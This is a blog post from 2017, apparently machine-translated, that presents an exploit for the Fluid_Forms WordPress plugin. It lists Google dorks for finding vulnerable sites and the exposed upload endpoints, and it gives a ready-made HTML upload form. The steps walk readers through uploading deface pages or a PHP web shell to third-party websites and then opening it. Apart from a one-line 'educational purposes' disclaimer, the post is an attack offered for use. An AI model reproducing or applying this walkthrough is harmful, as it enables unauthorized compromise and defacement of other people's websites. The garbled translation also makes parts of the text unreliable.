Exploit Vulnerable Wordpress Plugin By Fluid_Forms - 04 Day

04day is totally for educational purposes and did not encourage unethical hacking

Breaking

Saturday, September 23, 2017

Exploit Vulnerable Wordpress Plugin By Fluid_Forms



Today is WordPress once it's gone? Hezhei joked, just want to learn martial arts then come to CMS
 Wordpress all together

Requirements
Google Dork
+> inurl:"fluid_forms"
+> inurl:"/wp-content/plugins/fluid_forms/file-upl­oad/"
+> index of /wp-content/plugins/fluid_forms/file-upl­oad/
Exploit
/wp-content/plugins/fluid_forms/file-upload/server/php/
/wp-content/plugins/fluid_forms/file-upload/server/content/php/


How to do
1, Copy the top up to Google Search

2, open any website that contains fluid_forms

3, change the old link link of the homepage, switch to our Exploit link
ឧ​, http://site.com/wp-content/plugins/fluid_forms/file-upload/index.php​?​=123
Switch to
ឧ​, http://site.com/wp-content/plugins/fluid_forms/file-upload/server/php
ឧ​, http://site.com/wp-content/plugins/fluid_forms/file-upload/server/content/php

4, Once changed, and if you see the site publishing such data, it means that it has a weak point


5, Please create an HTML file, then copy the code below into a folder
 <form method="POST" action="www.target.com/wp-content/plugins/fluid_forms/file-upload/server/php/" enctype="multipart/form-data">  
 <input type="file" name="files[]" /><button>Upload</button>  
 </form>  

6, then copy the link of our Plus website and our Exploit link into the Action of Form, then Save

7, open HTML, you will see upload places, upload files like Deface Image, Deface Page, Text or Shell by understanding. Know your

9, To open the file you have uploaded, please go to the link section

ឧ​, www.site.com/wp-content/plugins/fluid_forms/file-upload/server/php/files/your shell.php

10, yes, thank you


































No comments:

Post a Comment

Post Top Ad